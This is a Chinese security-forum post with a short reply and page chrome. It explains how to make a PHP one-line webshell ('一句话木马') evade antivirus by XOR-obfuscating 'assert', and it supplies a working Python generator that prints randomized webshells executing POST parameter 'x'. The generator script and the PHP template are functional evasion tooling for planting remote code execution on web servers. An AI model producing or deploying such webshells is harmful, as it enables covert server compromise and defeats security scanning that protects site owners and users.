Warning!

本项目仅个人测试，使用后请尽快删除。

严禁用于非法用途!一切后果与本人无关

免杀一句话的方法

使用脚本给一句话木马加密
采用公开的接口加密
采用异或生成一句话木马

异或生成的核心

随即两个数异或产生的第三个数，与其中一个数再次异或得到是另一个数
例子：
4 ^ 5 = 1
1 ^ 4 = 5
这样我们就可以把assert变成两个字符串异或得来的，核心算法就是这些。

脚本

import chardet
import base64
import random
import sys
 
func = 'assert'
 
 
def random_obj_name(length):
    s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(s, length))
 
 
def random_key(length):
    s = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.sample(s, length))
 
 
def xor(s1, s2):
    return hex(ord(s1) ^ ord(s2)).replace("0x", r'\x')
 
 
def gen_payload(func):
    func_line1 = ''
    func_line2 = ''
    key = random_key(len(func))
    for i in range(len(func)):
        t_xor = xor(func[i], key[i])
        func_line1 += key[i]
        func_line2 += t_xor
    payload = "'" + func_line1 + "'" + '^' + '"' + func_line2 + '"'
    return payload
 
 
shell_form = '''<?php
class {class_name}{{
    function __destruct(){{
        ${var_name1}={func1};
        return @${var_name1}("$this->{var_name2}");
    }}
}}
${objname}=new {class_name}();
@${objname}->{var_name2}=$_POST['x'];
?>'''
 
 
def gen_ms_webshell(func):
    class_name = random_obj_name(4)
    objname = class_name.lower()
    webshell = shell_form.format(class_name=class_name, func_name=random_obj_name(4), objname=objname,
                                 var_name1=random_obj_name(4), var_name2=random_obj_name(4), func1=gen_payload(func))
    print(webshell)
 
gen_ms_webshell(func)

[培训]传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！

收藏・4

免费・1

支持

最新回复 (1)
葛东雪币： 122 活跃值： (145) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 29 粉丝 0 关注私信	葛东 2 楼这么好的贴,都不顶一下吗 2022-3-5 22:13 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

wx_CSer

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (1)
葛东雪币： 122 活跃值： (145) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 29 粉丝 0 关注私信	葛东 2 楼这么好的贴,都不顶一下吗 2022-3-5 22:13 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复